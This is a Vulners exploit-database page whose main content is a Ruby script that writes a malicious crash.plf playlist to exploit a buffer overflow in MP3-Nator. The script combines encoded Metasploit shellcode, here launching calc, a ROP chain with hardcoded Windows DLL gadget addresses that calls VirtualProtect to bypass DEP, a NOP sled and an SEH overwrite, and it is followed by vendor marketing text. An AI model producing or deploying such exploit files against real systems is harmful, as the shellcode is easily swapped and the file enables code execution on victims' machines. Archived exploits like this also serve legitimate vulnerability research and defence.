Vulners
Lucene search
MP3-Nator-Buffer-Overflow
filename = 'crash.plf'
# ./msfpayload windows/exec CMD=calc EXITFUNC=seh R | ./msfencode -e x86/alpha_mixed -b '\x00' -t ruby
# [*] x86/alpha_mixed succeeded with size 456 (iteration=1)
shellcode =
"\x89\xe3\xda\xcf\xd9\x73\xf4\x58\x50\x59\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +
"\x42\x75\x4a\x49\x49\x6c\x4d\x38\x4d\x59\x47\x70\x43\x30" +
"\x47\x70\x43\x50\x4e\x69\x48\x65\x50\x31\x48\x52\x43\x54" +
"\x4c\x4b\x51\x42\x46\x50\x4e\x6b\x50\x52\x44\x4c\x4c\x4b" +
"\x50\x52\x46\x74\x4e\x6b\x51\x62\x45\x78\x46\x6f\x4c\x77" +
"\x43\x7a\x47\x56\x50\x31\x49\x6f\x45\x61\x49\x50\x4e\x4c" +
"\x47\x4c\x45\x31\x43\x4c\x47\x72\x44\x6c\x51\x30\x4f\x31" +
"\x48\x4f\x46\x6d\x43\x31\x49\x57\x4b\x52\x4a\x50\x46\x32" +
"\x43\x67\x4c\x4b\x46\x32\x46\x70\x4e\x6b\x43\x72\x47\x4c" +
"\x47\x71\x48\x50\x4c\x4b\x47\x30\x43\x48\x4b\x35\x4b\x70" +
"\x50\x74\x43\x7a\x47\x71\x4e\x30\x42\x70\x4c\x4b\x51\x58" +
"\x42\x38\x4c\x4b\x42\x78\x51\x30\x46\x61\x48\x53\x49\x73" +
"\x47\x4c\x43\x79\x4e\x6b\x44\x74\x4e\x6b\x45\x51\x49\x46" +
"\x46\x51\x49\x6f\x45\x61\x4b\x70\x4c\x6c\x4f\x31\x48\x4f" +
"\x46\x6d\x43\x31\x4a\x67\x47\x48\x4d\x30\x50\x75\x48\x74" +
"\x47\x73\x43\x4d\x4a\x58\x45\x6b\x43\x4d\x47\x54\x42\x55" +
"\x4b\x52\x50\x58\x4c\x4b\x50\x58\x45\x74\x47\x71\x4e\x33" +
"\x51\x76\x4e\x6b\x44\x4c\x42\x6b\x4e\x6b\x46\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4e\x6b\x44\x44\x4c\x4b\x46\x61\x4a\x70" +
"\x4f\x79\x50\x44\x44\x64\x44\x64\x51\x4b\x43\x6b\x51\x71" +
"\x43\x69\x50\x5a\x42\x71\x4b\x4f\x4d\x30\x46\x38\x43\x6f" +
"\x50\x5a\x4c\x4b\x47\x62\x48\x6b\x4f\x76\x43\x6d\x43\x5a" +
"\x43\x31\x4c\x4d\x4e\x65\x48\x39\x45\x50\x47\x70\x47\x70" +
"\x46\x30\x42\x48\x46\x51\x4e\x6b\x42\x4f\x4e\x67\x49\x6f" +
"\x4e\x35\x4d\x6b\x4b\x4e\x46\x6e\x44\x72\x4a\x4a\x50\x68" +
"\x4c\x66\x4a\x35\x4f\x4d\x4f\x6d\x4b\x4f\x48\x55\x47\x4c" +
"\x47\x76\x43\x4c\x46\x6a\x4d\x50\x4b\x4b\x4d\x30\x44\x35" +
"\x45\x55\x4f\x4b\x47\x37\x47\x63\x43\x42\x50\x6f\x51\x7a" +
"\x45\x50\x42\x73\x4b\x4f\x49\x45\x45\x33\x43\x51\x50\x6c" +
"\x51\x73\x45\x50\x47\x7a\x41\x41"
junk1 = 'A' * 28
# ROP1
rop1 = ''
rop1 << [0x71ABDAC3].pack('V') # PUSH ESP # POP ESI # RETN [Module : WS2_32.dll]
rop1 << [0x71ABDC56].pack('V') # MOV EAX,ESI # POP ESI # RETN [Module : WS2_32.dll]
rop1 << "DEAD" # PADDING
rop1 << [0x1001595E].pack('V') # ADD ESP,20 # RETN - xaudio.dll
# VIRTUALPROTECT PARAMETERS
params = ''
params << [0x7C801AD4].pack('V') # VirtualProtect
params << 'WWWW' # return address [ PARAM #1 ]
params << 'XXXX' # lpAddress [ PARAM #2 ]
params << 'YYYY' # Size [ PARAM #3 ]
params << 'ZZZZ' # flNewProtect [ PARAM #4 ]
params << [0x5ADA1005].pack('V') # writeable address
params << 'BEEF' * 2 # PADDING
# ROP2 - [ PARAM #1 ]
rop2 = ''
rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN [Module : ole32.dll]
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll]
rop2 << "BEEF" # PADDING
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll]
rop2 << 'BEEF' # PADDING
rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN [Module : RPCRT4.dll]
rop2 << 'BEEF'
# ROP2 - [ PARAM #2 ]
rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN [Module : ole32.dll]
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll]
rop2 << 'BEEF' # PADDING
rop2 << [0x77157D1D].pack('V') * 4 # INC ESI # RETN [Module : oleaut32.dll]
rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN [Module : RPCRT4.dll]
rop2 << 'BEEF'
# rop2 - [ PARAM #3 ]
rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN [Module : ole32.dll]
rop2 << [0x77E8559E].pack('V') # XOR EAX,EAX # RETN [Module : RPCRT4.dll]
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll]
rop2 << 'BEEF' # PADDING
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll]
rop2 << 'BEEF' # PADDING
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll]
rop2 << 'BEEF' # PADDING
rop2 << [0x77157D1D].pack('V') * 4 # INC ESI # RETN [Module : oleaut32.dll]
rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN [Module : RPCRT4.dll]
rop2 << 'BEEF'
# rop2 - [ PARAM #4 ]
rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN [Module : ole32.dll]
rop2 << [0x77E8559E].pack('V') # XOR EAX,EAX # RETN [Module : RPCRT4.dll]
rop2 << [0x77C4EC1D].pack('V') # ADD EAX,40 # POP EBP # RETN [Module : msvcrt.dll]
rop2 << 'BEEF' # PADDING
rop2 << [0x77157D1D].pack('V') * 4 # INC ESI # RETN [Module : oleaut32.dll]
rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN [Module : RPCRT4.dll]
rop2 << 'BEEF'
# POINT ESP TO VIRTUALPROTECT
rop2 << [0x7475B960].pack('V') # XCHG EAX,ESP # RETN [Module : MSCTF.dll]
nops = "\x90" * 310
junk1 = junk1 + rop1 + params + rop2 + nops + shellcode + 'A' * (4112 - (junk1 + rop1 + params + rop2 + nops + shellcode).length)
seh = [0x10019C35].pack('V') # ADD ESP,41C # RETN - xaudio.dll
junk2 = 'C' * (10000 - (junk1 + seh).length)
xploit = junk1 + seh + junk2
File.open(filename,'w') do |fd|
fd.write xploit
puts "file size : #{xploit.length.to_s}"
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Jan 2015 12:25Current
7.4High risk
Vulners AI Score7.4